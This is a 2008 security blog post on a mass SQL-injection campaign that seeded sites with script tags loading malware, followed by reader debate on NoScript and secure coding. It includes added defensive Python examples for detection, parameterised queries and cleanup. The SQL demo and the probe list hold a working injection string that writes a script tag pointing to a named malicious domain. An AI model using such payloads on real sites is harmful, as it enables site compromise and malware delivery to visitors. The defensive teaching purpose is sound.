
Hundreds of Thousands of Microsoft Web Servers Hacked

Hundreds of thousands of Web sites, including several at the United Nations and in the U.K. government, have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors' machines.

The attackers appear to be breaking into the sites with the help of a security vulnerability in Microsoft's Internet Information Services (IIS) Web servers. In an alert issued last week, Microsoft said it was investigating reports of an unpatched flaw in IIS servers, but at the time it noted that it wasn't aware of anyone trying to exploit that particular weakness.

On Thursday, Spanish anti-virus vendor Panda Security said that it had alerted Microsoft that a flaw in IIS was the cause of all the break-ins. When I asked Microsoft whether they'd heard from Panda, or whether the hundreds of thousands of sites were hacked through a patched or an unpatched flaw in IIS, a company spokesman didn't offer much more information.

"Microsoft is currently aware of and is receiving reports regarding public claims of attacks on IIS Web servers," said Bill Sisk, a security response manager at Microsoft, in a statement e-mailed to Security Fix. "While we have not be [sic] contacted directly regarding these reports, we will continue to monitor all reports either publically [sic] shared or responsibly disclosed and investigate once sufficient details are provided. We have not yet determined whether or not these reports are related to Microsoft Security Advisory (951306) released last week."

According to Finnish anti-virus maker F-Secure, the number of hacked Web pages serving up malicious software from this attack may be closer to half a million.

Dancho Danchev, an independent security analyst, has a decent write-up on the signs Web site owners can look for to tell whether their site has been hit by this attack. Danchev said all of the hacked sites appear to have JavaScript code added to their page source that silently pulls down malware from a few domains in China, namely nihaorr1.com and haoliuliang.net.

Needless to say, a Google search for these domains turns up tens of thousands of pages that contain the script that redirects visitors to the malicious sites. I would strongly urge people to steer clear of those sites; I mention them here so that Web site owners can more easily search the HTML source of their own pages for these domains.
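For Web site owners who want to automate that search, here is an added example (written for this page, not code from the original post or from Danchev's write-up): it parses a page's source for script and iframe tags whose src host is one of the two domains above, and also reports the domains wherever else they appear in the text, since an injected reference can sit inside inline script rather than in a tag attribute. The sample pages and the script paths in them are constructed, and the domain list is only as good as it is current.

```python
"""Scan page source for references to the malicious domains named above.

Added example (not from the original post). IOC_DOMAINS holds the two
domains the post names; the sample HTML at the bottom is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

IOC_DOMAINS = {"nihaorr1.com", "haoliuliang.net"}


class _SrcCollector(HTMLParser):
    """Collect the src attribute of every script and iframe tag."""

    def __init__(self):
        super().__init__()
        self.refs = []  # list of (tag, src)

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            for name, value in attrs:
                if name == "src" and value:
                    self.refs.append((tag, value))


def host_of(src: str) -> str:
    """Lower-cased host of a src value.

    Injected tags often omit quotes or the scheme, so a scheme is supplied
    before parsing; a relative path such as /js/site.js yields a junk host
    that never matches the list.
    """
    s = src.strip()
    if "://" not in s:
        s = "http://" + s.lstrip("/")
    return (urlsplit(s).hostname or "").lower()


def is_ioc_host(host: str) -> bool:
    """Match the domain itself or any subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def scan_html(html: str) -> dict:
    """Tags pointing at a listed host, plus bare mentions of the domains anywhere."""
    collector = _SrcCollector()
    collector.feed(html)
    tags = [(tag, src) for tag, src in collector.refs if is_ioc_host(host_of(src))]
    lowered = html.lower()
    mentions = sorted(d for d in IOC_DOMAINS if d in lowered)
    return {"tags": tags, "mentions": mentions}


# Constructed sample pages: one clean, two carrying an injected reference.
CLEAN_PAGE = '<html><body><p>Hello</p><script src="/js/site.js"></script></body></html>'
SCRIPT_PAGE = ('<html><body><p>Welcome.</p>'
               '<script src=http://nihaorr1.com/1.js></script></body></html>')
IFRAME_PAGE = ('<html><body><p>Agenda</p>'
               '<iframe src="http://www.haoliuliang.net/x.htm" width=0 height=0>'
               '</iframe></body></html>')

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("script", SCRIPT_PAGE), ("iframe", IFRAME_PAGE)]:
        print(name, scan_html(page))
```

Run it over the HTML your server actually sends (or over the stored content that gets rendered into the pages); a hit in "mentions" with nothing in "tags" is worth a manual look, since it usually means the reference has been wrapped in script rather than placed in a plain tag.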

There are indications that this attack is coming in waves, with the bad guys swapping in new malicious downloader sites every few days. According to posts on an IIS user forum at IIS.net, Web site administrators first saw signs of this attack on April 17, the day before Microsoft issued its initial advisory on the IIS vulnerability.

If you run your site on IIS, take a moment to consider applying the workarounds in the Microsoft advisory for your version of IIS. The IIS.net forum post mentioned above also has some good tips to help administrators lock down their systems.

Attacks like this, which infiltrate legitimate, trusted Web sites, are precisely the reason I so often recommend Firefox over Internet Explorer. A Firefox add-on called NoScript blocks injected JavaScript of this kind from running automatically if a user happens to visit a hacked site. Currently there is no equivalent protection for IE users, and disabling JavaScript entirely isn't really an option on today's Web. True, you can fiddle with multiple settings in IE to add certain sites to your "Trusted Zone," but that option has never struck me as very practical or scalable.

Update, April 29, 11:28 a.m. ET: In a post to one of its blogs, Microsoft says this attack was not the fault of a flaw in IIS: "..our investigation has shown that there are no new or unknown vulnerabilities being exploited. This wave is not a result of a vulnerability in Internet Information Services or Microsoft SQL Server. We have also determined that these attacks are in no way related to Microsoft Security Advisory (951306). The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies. SQL injection attacks enable malicious users to execute commands in an application's database. To protect against SQL injection attacks the developer of the Web site or application must use industry best practices outlined here. Our counterparts over on the IIS blog have written a post with a wealth of information for web developers and IT Professionals can take to minimize their exposure to these types of attacks by minimizing the attack surface area in their code and server configurations."
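What "facilitated by SQL injection exploits" means in practice, as an added example rather than code from the post or from Microsoft: the same page lookup written first in the classic-ASP way, pasting a request value into the statement text, and then with the value bound as a parameter. An in-memory SQLite database stands in for SQL Server; the table, the request value and the script path in the payload are assumptions, and executescript() models a driver that accepts batched statements, which is what lets the second statement ride along (Python's plain execute() would refuse it).

```python
"""Dynamic SQL versus a parameterised query, with an injected page tag as payload.

Added example; sqlite3 stands in for SQL Server, and the news table,
request parameter and script path are constructed for the demo.
"""
import sqlite3

# What an automated tool might send in an "id" parameter: the digit satisfies
# the intended WHERE clause, the rest appends a script tag to every stored body.
INJECTED_ID = ("1; UPDATE news SET body = body || "
               "'<script src=http://nihaorr1.com/1.js></script>'")


def make_db() -> sqlite3.Connection:
    """Throwaway content table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [("Press release", "<p>Welcome.</p>"), ("Agenda", "<p>Day one.</p>")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> None:
    """Classic-ASP style: the request value is pasted into the statement text.

    executescript() models a driver that runs batched statements, as the
    ASP + SQL Server stack does; a second statement in the value runs too.
    """
    conn.executescript("SELECT title FROM news WHERE id = " + raw_id)


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Parameterised: the value is bound as data and never parsed as SQL."""
    return conn.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()


def bodies(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT body FROM news ORDER BY id")]


def run_vulnerable() -> list:
    """Page bodies after the injected request hit the dynamic-SQL lookup."""
    conn = make_db()
    lookup_vulnerable(conn, INJECTED_ID)
    return bodies(conn)


def run_safe() -> tuple:
    """(page bodies, rows found) after the same request hit the bound lookup."""
    conn = make_db()
    rows = lookup_safe(conn, INJECTED_ID)  # no row has that literal id, so nothing matches
    return bodies(conn), rows


if __name__ == "__main__":
    print("dynamic SQL  :", run_vulnerable())
    print("parameterised:", run_safe())
```

The point of the comparison: the bound version never needs to know what a hostile value looks like, which is why the vendor's advice above points at the application code rather than at the server.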

Shadowserver.org has a nice writeup with a great deal more information about the mechanics behind this attack, as does the SANS Internet Storm Center.

By Brian Krebs  |  April 25, 2008; 8:00 AM ET
Categories:  Fraud , From the Bunker , Latest Warnings , Safety Tips  

Comments

The way the infection is spreading across web servers is fairly simple, and it does not involve any particular Microsoft IIS vulnerability.
These attacks are launched by an automated tool using Google to find SQL injection vulnerable sites and exploiting them.
By default this tool searches for Microsoft ASP pages (an IIS specific web development technology) and injects a Microsoft SQL Server specific payload: these defaults, maybe, have generated the false perception that an IIS vulnerability is involved, while the infection is just leveraging trivial coding errors made by the web developers.
The U.N. case is emblematic, since the site bug is the very same I reported last year, and had been previously used to perform the famous "hacktivist" defacement. Nonetheless, it's still unpatched.
More details here: http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-you-so/

Posted by: Giorgio Maone | April 25, 2008 9:41 AM

Yeah what he said ^^

Posted by: SyncRait | April 25, 2008 9:46 AM

it would be interesting if the person handling public communication with you (and, i would assume, other folks outside of microsoft) could actually spell things correctly...

Posted by: IMGoph | April 25, 2008 10:16 AM

Do what I did - switch to Linux - for increased security. Ubuntu Linux 8.04 (www.ubuntu.com) just came out yesterday, April 24, 2008. Ubuntu Linux can live nicely on a Windows machine if you are not ready to switch entirely to a new operating system.

Posted by: Delafield | April 25, 2008 11:11 AM

Although switching to Linux is an option, it isn't necessary to go that far. Just run Apache 2 on your Windows server. If this is, as the first poster suggests, an SQL injection attack, then the web code needs to be tightened up regardless of the OS or webserver being used. The old adage of never trusting user input needs to be applied to these sites.

Posted by: BP | April 25, 2008 11:26 AM

as if sql injection attacks can be prevented by switching to linux or apache. this is a programming error by the website developer, not a defect in the OS or webserver. do your homework before you go running your mouths...

Posted by: Ben | April 25, 2008 12:38 PM

Or as SANS points out,

"The next time you read something about "OH NOEZ THE EXPLOIT IS TAKING OVER TEH WORLD. OMG LOL!!11". Try not and panic, it's probably not as big as it's claimed to be."

One thing to keep in mind about compromised websites
http://isc.sans.org/diary.html?storyid=4334

Posted by: TJ | April 25, 2008 1:00 PM

You said using "Trusted Zones" isn't practical? How is it not? How is using an add-on more practical than using a built-in feature?

Posted by: Practical | April 25, 2008 1:01 PM

To back up what Giorgio said, the company I work for was hit by this and our investigations point to an SQL injection attack. Incidents like this just highlight the need for bullet proof input validation. Anyone wanting more info could check out: http://forums.iis.net/t/1148917.aspx?PageIndex=1

Posted by: Steve | April 25, 2008 1:08 PM

"...it's probably not as big as it's claimed to be."
Unless you're one of the victims.

"...bullet proof input validation."
'Picked the wrong planet for that.

Posted by: J. Warren | April 25, 2008 1:14 PM

Quote: "You said using "Trusted Zones" isn't practical? How is not? How is using an add-on more practical than using a built in feature?"
--------
Have you even used it? NoScript uses fewer mouseclicks, has on the fly configurability, and tells you what a site is trying to execute and when. Just reading this blog at washingtonpost.com, my browser tries to reference googlesyndication.com, revsci.net, and doubleclick.net, and this is a security blog.

It's MY browser, and the only page I consented to load was washingtonpost.com. Wait, what? When did that become unreasonable?

Offsite scripting is out of control, and I'm no MS basher but they are way behind the curve in protection of consumer privacy at this point. IE ships vulnerable out of the box with a Medium-High security setting that allows people to be prompted with tricky ActiveX installers without even knowing what they are for, and it executes offsite javascript by default. Their goofy zones are too generalized and too hidden in 2008. People just avoid using HIGH security as a result.

Firefox should ship with NoScript installed and activated, IE should ship with NoScript like functionality, and if a user can't figure out why their browser won't work, then that's the perfect acid test that tells us they are too irresponsible to be on today's extremely dangerous web. Gone are the days when you could just disable javascript and have your important sites work, now everything uses it, and releasing a browser without granular javascript controls is just plain irresponsible.

Connecting a browser to the internet ought to be treated like driving a car--people should need to prove a baseline of competence because their actions impact the quality of life for others.

Posted by: Eponymous | April 25, 2008 1:57 PM

@Practical asked: "You said using "Trusted Zones" isn't practical? How is not? How is using an add-on more practical than using a built in feature?" Step one is to disable javascript for all sites; this is a one-time action on all platforms. Then you need to start adding the sites that you trust to a whitelist.

In IE, you click on "Tools", "Internet Options", the "Security" tab, the "Trusted Sites" icon, the "Sites" button, and finally type in the DNS name of the site. If you were clever, you copied the name from the address bar before starting, otherwise you need to type in the entire thing by hand. It takes about ten seconds to perform all of these steps.

"Noscript", on the other hand, adds an icon to the browser status bar. Clicking on the icon pops up a menu that lists every DNS address mentioned on the current page. You just point your mouse to "blog.washingtonpost.com" and you're done in under a second. Since scripts from, say, nihaorr1.com aren't allowed to run, you're safe!

Also, "blog.washingtonpost.com" runs scripts hosted by "www.washingtonpost.com" and "media.washingtonpost.com", so you need to add them to the whitelist as well. In Noscript, you see those names in the popup menu and can select them easily. In IE, you need to "View source" and look for SCRIPT tags, which takes much longer and is prone to errors.

Posted by: Sam D. | April 25, 2008 2:00 PM

Eponymous, take a pill. Everyone else, study. The web should make use of emerging technologies as well as mature technologies, such as client-side scripting. period. They don't call it web stagnant state, they call it web development. I want a rich user experience and blocking client side scripting for fear of whatever your fears are is silly. Don't put information you don't want available to people on a computer hooked up to the web. The likely reason for what happened with this sudden onset of hacks is scores of so-called professionals writing awful code. It's way easier to find a list of servers with injection vulnerabilities running wild than to forcibly exploit a weakness in the inner workings of IIS. There are a bunch of places in the process where this can be avoided beforehand. So my opinion stands that, if you are a professional, act accordingly. Go to great lengths to write better code, understand how the systems work, and follow best practices. If you act accordingly, these issues are pretty easy to resolve if they do crop up.

Posted by: Wowzers | April 25, 2008 2:19 PM

Brian Krebs -- We've got conflicting information here about whether this is truly an IIS vuln or a more generic code injection. Can you confirm/clarify one way or another? Thanks.

Posted by: Tom | April 25, 2008 2:20 PM

Sam D., would you care to enumerate the steps required to install the NoScript extension? I bet it's longer than the Trusted Sites installation.

Posted by: John S. | April 25, 2008 2:22 PM

John S: To install it, google "noscript", click on "NoScript :: Firefox Add-ons" then "Add to Firefox" then "Install".

The Google search page is the default home page in Firefox, so the user does not have to navigate there themselves. If you wanted to give more direct instructions, you could link to the addon page itself (https://addons.mozilla.org/en-US/firefox/addon/722), and from there the user only needs to click twice to install NoScript. That's fewer clicks than are required to get to the Trusted Sites list in IE.

This is a fair comparison, since despite Trusted Sites being installed by default, you would still have to tell a new user that the feature exists and how to use it. It takes more work per site to use Trusted Sites than it does to install and use NoScript for the first time.

Posted by: Douglas | April 25, 2008 3:27 PM

John S: click Tools / Addons, the addon dialog appears, click Get Addons, type "noscript" into the search box and it appears, click Install

Posted by: John C | April 25, 2008 3:42 PM

I agree with J. Warren's assessment on bullet proof input validation ...

http://isc.sans.org/diary.html?storyid=3823

Posted by: CBW | April 25, 2008 4:20 PM

Go to CoreTrace.com they can solve problems like this.

Posted by: Anonymous | April 25, 2008 5:39 PM

Tom -- There is no doubt SQL is a vector here. The question I put to Microsoft about the IIS vulnerability came about from the Panda advisory, which said it had alerted Microsoft to a vulnerability in IIS that was being used in this attack.

It may well be that Panda (which still has not returned my messages, btw) is completely mistaken about any vulnerabilities in IIS contributing to this episode in any meaningful way. I put the question straight to Microsoft, whether they'd heard from Panda and whether this mass hack was at all related to a new IIS vuln or one that they issued an advisory about last week. Their answer, detailed in the blog entry above, was hardly definitive either way (their inclusion of the term "responsible disclosure" in answering my question may be noteworthy).

FWIW, below follows the text of the advisory Panda published yesterday:

------

"Panda Security advises webmasters to check their Web pages, due to a massive hacker attack

- A vulnerability in Internet Information Servers allows cyber crooks to inject SQL code to manipulate legitimate Web pages. As a result, visitors are redirected to a malicious website designed to install malware on computers

- According to PandaLabs, at least 282,000 Web pages of all types have been affected, and this number is increasing

- The attack is easily detected, as a very specific code string is inserted in the compromised page's source code

MADRID, April 24, 2008

PandaLabs has reported a vulnerability in Internet Information Server which is allowing a massive hacker attack. This attack currently affects 282,000 Web pages, and this number could increase drastically.

This security problem allows hackers to inject SQL code in all the pages hosted on a Web server. This code is designed to redirect all visitors at compromised pages to a malicious website which analyzes systems for vulnerabilities that could be used to download all types of threats.

The situation is exacerbated by the fact that most of the web pages affected show no suspicious signs whatsoever and many of them have numerous visitors.

How to detect if a web page has been manipulated

Panda Security advises all webmasters with pages hosted on Internet Information Server to check as soon as possible if their web pages have been affected. The procedure is simple, as it involves searching for a specific code string in the source code of the web page, associated to an IFRAME tag. This string is:

If detected, it should be immediately eliminated and those responsible for administering the server hosting the Web pages should be warned to enable them to implement the corresponding security measures.

Given the large number of Web pages affected, many users could have been infected by all types of malicious code, including new strains as yet unrecognized by security companies.

Posted by: Bk | April 25, 2008 5:42 PM

I am a security professional and though I ran with NoScript for awhile, I found it to require way too many clicks all the time and stopped. As stated above, pages on commercial (and often non-commercial) sites these days have a huge number of JavaScript calls to different off-domain servers (many often required for the site to even function properly), resulting in a billion requests for scripting access with every page you go to. I just found it to be too impractical and slow to browse with that on. I certainly don't think it's remotely reasonable for the average user.

The IE approach (if I recall it correctly) of either allowing no scripts to run (once you've set it up that way) on a site, or allowing all scripts to run, regardless of origin, is a more usable approach for the average user, though of course it doesn't help with the case of a legitimate site that's been compromised and is serving up some malicious offsite scripts along with its legitimate content, as in this case.

Posted by: Dan H. | April 25, 2008 5:53 PM

You can filter out the SQL injection strings with WebKnight, an open source ISAPI filter.

Posted by: Jilly | April 25, 2008 5:59 PM

@Tom, @Brian:
Some clarifications and advices at
http://hackademix.net/2008/04/26/mass-attack-faq/

@Dan:
IE's zones are far less usable than NoScript because they require a complex navigation sequence through modal dialogs for each site you want to allow, while NoScript's contextual menu is accessible with a single click.

Posted by: Giorgio Maone | April 25, 2008 7:03 PM

>>True, you can fiddle with multiple settings in IE to add certain sites to your "Trusted Zone," but that option has never struck me as very practical or scalable.

Don't knock it till you've tried it.
http://www.spywarewarrior.com/uiuc/btw/ie/ie-opts.htm#trusted

@ Eponymous:
>>Offsite scripting is out of control, and I'm no MS basher but they are way behind the curve in protection of consumer privacy at this point. IE ships vulnerable out of the box with a Medium-High security setting that allows people to be prompted with tricky ActiveX installers without even knowing what they are for, and it executes offsite javascript by default.

But IE7 on Vista runs in a "sandbox", so Windows Enthusiasts will claim it's all good. And -- so long as other browser users also get to run theirs in one -- they might turn out to be right.
http://sandboxie.com

>>Their goofy zones are too generalized and too hidden in 2008.

Actually, the idea of zones makes sense (NoScript creates the analogue of a Trusted Sites zone: a whitelist, if you will); IE's are just configured wrong by default (whereas "right" would be "deny all, then allow exceptions"). I agree about "too hidden", especially the My Computer zone.

@ Wowzers:
>>The web should make use of emerging technologies as well as mature technologies, such as client-side scripting. period.

Only if you can convince me that your site's scripts are trustworthy. Otherwise, your site can either stay in the (strengthened) Internet zone by default, or it can run its scripts in a "sandbox".

>>I want a rich user experience

The problem is, malware writers also want you to have a rich user experience; it's having one without enabling them that's the trick.

>>and blocking client side scripting for fear of whatever your fears are is silly.

Do you trust _everyone on the Internet_ to run script code in your browser? If so, why?

Posted by: Mark Odell | April 25, 2008 8:18 PM

@ Dan H.:
Doesn't NoScript have config options to just let you whitelist the sites you want to allow to run scripts, and never bug you about other sites you visit?
http://noscript.net/features#options

>>The IE approach (if I recall it correctly) of either allowing no scripts to run (once you've set it up that way) on a site, or allowing all scripts to run, regardless of origin, is a more usable approach for the average user,

....until his Windows instance becomes unusable &/or pwned due to all the malware installed from allowing all scripts to run.

@ Giorgio Maone:
>>IE's zones are far less usable than NoScript because they require a complex navigation sequence through modal dialogs for each site you want to allow,

....unless you install IE Power Tweaks (see my first link above).

(Giorgio, I expect to be able to configure NoScript to [1] run scripts on sites in a whitelist, [2] block scripts on all other sites not in that whitelist, and [3] otherwise _shut up_.)

Posted by: Mark Odell | April 25, 2008 8:58 PM

Please learn how to spell IIS.

Posted by: Jeffrey | April 25, 2008 11:41 PM

and of course the injection can be turned around and the same SQL used to cleanse the attack pretty simply - http://tinyurl.com/6g2a95

Posted by: nihaorr1-injection | April 26, 2008 12:12 AM
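Along the lines of that comment, an added example (not the linked script, and not from the original post) of the cleanup side: walk every text-typed column of every user table, count the cells carrying an injected tag, and strip it in place with REPLACE. SQLite's catalog (sqlite_master and PRAGMA table_info) stands in for SQL Server's, and the marker string, tables and rows are constructed; the script path in the marker is an assumption. Table and column names come from the catalog, not from a request, so they are interpolated as identifiers; the marker is bound as data.

```python
"""Find and strip an injected script tag from every text column in a database.

Added example (not from the original post). sqlite3 stands in for SQL Server;
the marker, tables and rows below are constructed for the demo.
"""
import sqlite3

# The exact string to remove. The domain is the one named in the post, the
# path is an assumption. Run once per variant observed: the attack swaps in
# new download sites every few days, so one marker will not catch every wave.
MARKER = "<script src=http://nihaorr1.com/1.js></script>"


def text_columns(conn: sqlite3.Connection) -> list:
    """(table, column) for every text-typed column of every user table."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    cols = []
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(k in ctype.upper() for k in ("CHAR", "TEXT", "CLOB")):
                cols.append((table, name))
    return cols


def count_infected(conn: sqlite3.Connection, marker: str = MARKER) -> int:
    """Number of cells (row, column) that still contain the marker."""
    total = 0
    for table, col in text_columns(conn):
        # Identifiers come from the catalog, so bracket-quoting them is safe;
        # the marker itself is bound as a parameter.
        row = conn.execute(
            f"SELECT count(*) FROM [{table}] WHERE instr([{col}], ?) > 0", (marker,)
        ).fetchone()
        total += row[0]
    return total


def cleanse(conn: sqlite3.Connection, marker: str = MARKER) -> int:
    """Strip the marker from every text cell that carries it; returns cells changed."""
    changed = 0
    for table, col in text_columns(conn):
        cur = conn.execute(
            f"UPDATE [{table}] SET [{col}] = replace([{col}], ?, '') "
            f"WHERE instr([{col}], ?) > 0",
            (marker, marker),
        )
        changed += cur.rowcount
    conn.commit()
    return changed


def make_infected_db() -> sqlite3.Connection:
    """Constructed sample: two tables, three cells carrying the injected tag."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, author VARCHAR(40), text TEXT);"
    )
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)", [
        ("Press release", "<p>Welcome.</p>" + MARKER),
        ("Agenda", "<p>Day one.</p>" + MARKER),
        ("Contact", "<p>Call us.</p>"),
    ])
    conn.execute("INSERT INTO comments (author, text) VALUES (?, ?)",
                 ("guest", "Nice site." + MARKER))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = make_infected_db()
    print("infected cells before:", count_infected(db))
    print("cells cleaned        :", cleanse(db))
    print("infected cells after :", count_infected(db))
```

Cleaning the rows does not close the hole: until the dynamic SQL that let the statement in is fixed, the next wave writes the tag straight back, so run the count again a few hours later as a check that the fix held.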

please use condom ...errr Firefox to navigate the internet

keep far away from Internet Explorer ...it is too dangerous

hope it helps

orlando

Posted by: orlando | April 26, 2008 12:43 AM

@Mark Odell, who wrote:
"I expect to be able to configure NoScript to [1] run scripts on sites in a whitelist, [2] block scripts on all other sites not in that whitelist, and [3] otherwise _shut up_."

Just uncheck "NoScript Options|Notifications|Show message about blocked scripts". You will still be able to check the current status with a glance at the status bar icon.

Posted by: Giorgio Maone | April 26, 2008 3:43 AM

Publically [sic]?

Leave off, this is perfectly decent english. "Publicly" is the fudge.

Posted by: Michael Houghton | April 26, 2008 6:16 AM

IE7 does *not* run in a sandbox by default, the coming IE8 does however.

Posted by: Alexander Kellett | April 26, 2008 8:37 AM

It basically comes down to development discipline. It's a risk on any system if your developers don't develop for security.

You need to validate all data, and use whitelisting where possible not blacklisting. If it's a phone number then don't allow anything but numbers. Even then, this particular attack is good at getting around common filters.

You need components to talk to each other in ways that cannot execute the content. The way that so many sites work - building up database commands using the user input - is just wrong. Parametrised queries ensure that the data is preserved entirely as data.

Even once the data is safely in place, as long as it came from an untrusted source you must remember that it is untrusted data. Everywhere the data is used you must be aware. For example if displaying a user comment on a page you must either clean it up on entry using validation, or clean it up when you display it.

So, it's down to the developers who need to understand security. It's also down to development departments who need to ensure that the developers understand and ensure that time and budget is given for it.

Posted by: Richard | April 26, 2008 8:56 AM
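The validation and output-encoding practices in the comment above in running form, as an added example rather than the commenter's code; the phone-number rule, the field names and the sample inputs are assumptions. The parameter-binding practice is left out here; the block puts a naive blacklist next to a whitelist so the difference shows on the script and iframe forms mentioned on this page, and escapes a free-text field at display time, since a comment cannot be whitelisted the way a phone number can.

```python
"""Whitelist validation and output escaping for untrusted input.

Added example (not the commenter's code). The field rules and sample
inputs are constructed for the demo.
"""
import html
import re

# Whitelist: the only shape a phone number is allowed to have.
PHONE_RE = re.compile(r"\+?[0-9]{7,15}")


def validate_phone(value: str) -> str:
    """Accept digits (optionally with a leading +) and nothing else."""
    value = value.strip()
    if not PHONE_RE.fullmatch(value):
        raise ValueError("not a phone number")
    return value


def blacklist_allows(value: str) -> bool:
    """The kind of filter that is easy to get around: one spelling of one tag."""
    return "<script" not in value


def whitelist_allows(value: str) -> bool:
    try:
        validate_phone(value)
        return True
    except ValueError:
        return False


def render_comment(untrusted: str) -> str:
    """Escape at the point of output so stored text is shown as text, not run.

    A free-text field cannot be reduced to a whitelist pattern, so it is
    encoded for the context it is written into (here, HTML element content).
    """
    return "<p>" + html.escape(untrusted, quote=True) + "</p>"


# Constructed probes: a real number, a batched-statement payload, and the
# upper-case script and iframe tag forms that a one-spelling filter misses.
PROBES = [
    "+441234567890",
    "1; UPDATE news SET body = body || '<script src=http://nihaorr1.com/1.js></script>'",
    "<SCRIPT SRC=http://nihaorr1.com/1.js></SCRIPT>",
    '<iframe src="http://haoliuliang.net/x.htm" width=0 height=0></iframe>',
]


def compare_filters(values=PROBES) -> list:
    """(value, blacklist verdict, whitelist verdict) for each probe."""
    return [(v, blacklist_allows(v), whitelist_allows(v)) for v in values]


if __name__ == "__main__":
    for value, black, white in compare_filters():
        print(f"blacklist={black!s:5} whitelist={white!s:5} {value[:60]}")
    print(render_comment(PROBES[2]))
```

The blacklist lets three of the four probes through because it only knows one spelling of one tag; the whitelist rejects everything that is not a phone number without knowing anything about attacks at all, which is the commenter's point about whitelisting over blacklisting.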

My suggestion for safer surfing would be to run Giorgio Maone's NoScript on an updated version of a Firefox browser (fortunately, Signor Maone's latest version of the tool runs on both the stable (2.0.0.14) version of Firefox and the latest (3.0b5) beta version), and to check the websites therein displayed with tools like the McAfee SiteAdvisor and/or the Netcraft toolbar (alas, these latter do not (yet ?) support the Firefox betas). As a general rule, one need only allow the main site of the several that often appear on the NoScript menu without negatively influencing the functionality of the site ; thus, I am able to read Brian's excellent column, despite the fact I have only allowed one - washingtonpost.com - of the three sites displayed. This, however, is not always the case ; in order to run Youtube videos on my setup, for example, I must allow both youtube.com and ytimg.com....

Henri

Posted by: M Henri Day | April 26, 2008 11:25 AM

M Henri Day, no scripting at all is required to read or post to Security Fix. The Post in general requires it for a few of their stupider features (e.g. their so-called interactive guides and whatnot), but everything useful on the Post is accessible with Javascript disabled entirely.

Posted by: antibozo | April 26, 2008 12:47 PM

So, I installed NoScript w/ the most up-to-date FF release, and I am a very conservative web user. But if this exploit is hacking well-respected sites, such as major media and gov't sites, how do I know whether it's safe to allow a script from *any* site, even ones I use regularly?

Is it that it's always safe to allow the main url for the site you're choosing to look at, and you only have to look out for other odd URLs that show up on the same page?

If I browsed to one of the hacked pages, say the UN ones, right now, believing the UN to be a reliable site, what would the NoScript warnings say and how would I know to stay away?

Posted by: Advanced Amateur | April 26, 2008 1:03 PM

can we please have writers that have at least an iota of technical knowledge to write these articles. Half a million webpages does not amount to half a million web servers. one web server can serve thousands of webpages. Either the author is truly inept or it is done purposefully to make the article sound more sensational than it truly is

either way, the article is on techmeme, so mission accomplished. truth is highly overrated anyways.

Posted by: mk | April 26, 2008 3:58 PM

@Advanced Amateur:
If you browse on one of the U.N. hacked pages, NoScript blocks the malicious script even if you allow(ed) the "un.org" domain to run scripts. You must explicitly allow "nihaorr1.com" in order to let the malicious script run. In every serious attack on a "trustworthy" web site seen so far, the malicious scripts are loaded from external and usually very suspect sites, because a short inclusion script or iframe tag is much easier to inject and keep stealthy than the whole payload, and it's much more convenient for the attacker, who can stay in control of the code after the injection.
Furthermore, Firefox 3 will prevent you from opening the page as soon as Google's "StopBadware" system is aware of the infection.

So, as a rule of thumb:
1) Never allow scripts from a domain you've never heard of, especially if it's not the main site of the page (the bold one in NoScript menus)
2) Don't allow scripts unless there's really something you need which apparently can not work otherwise
3) When you visit a web site for the first time and you find you need scripts to be allowed, check site reputation with siteadvisor.com, mywot.com or a similar service (WOT reputation score is gonna be integrated in NoScript soon, for increased convenience)

Posted by: Giorgio Maone | April 26, 2008 5:50 PM

HACKED BY CHINESE

Posted by: AM | April 26, 2008 8:39 PM

So, MSFT should be attending to this newest vulnerability any day now, right? Vista SP3? Maybe in Windows Se7en?

Why is this so hard? Why is network security such an issue? Why do Windows fans keep defending ten years of poorly-managed work?

Posted by: Moeskido | April 26, 2008 9:25 PM

An addendum for non-techies to this learned discussion. 'No-Script' is not listed as a recommended Add-On at the Mozilla website. As a non-techie I only install the recommended Add-Ons.

If any readers can add detail or are familiar with the reason(s) that Mozilla doesn't recommend 'No-Script' I'd love to hear/read about it!

Posted by: KFritz | April 26, 2008 10:14 PM

This reminded me of Little Bobby Tables:
http://xkcd.com/327/

Posted by: f4a | April 27, 2008 3:46 AM

this news is pure FUD because this attack does NOT use any vulnerabilities in any of those two applications Microsoft IIS webserver and Microsoft SQL Server:
http://www.f-secure.com/weblog/archives/00001427.html
"So far we've only seen websites using Microsoft IIS webserver and Microsoft SQL Server being hit. Do note that this attack doesn't use any vulnerabilities in any of those two applications"

Posted by: suc | April 27, 2008 4:09 AM

Malicious JavaScript is not dangerous unless there is a flaw in the browser, and this is not the case.
So this malicious JavaScript is just trying to download/run malicious files, but this is not dangerous because the browser will prompt you for confirmation.

Posted by: suc | April 27, 2008 4:16 AM

Malicious JavaScript is not dangerous unless there is a flaw in the browser, and this is not the case.
What a malicious JavaScript can do is just try to download/run malicious files, but this is not dangerous because the browser will prompt you for confirmation.

Posted by: suc | April 27, 2008 4:18 AM

@suc:
Malicious JavaScript can be dangerous even in an imaginary flawless browser, see http://noscript.net/faq#qa1_10

@KFritz:
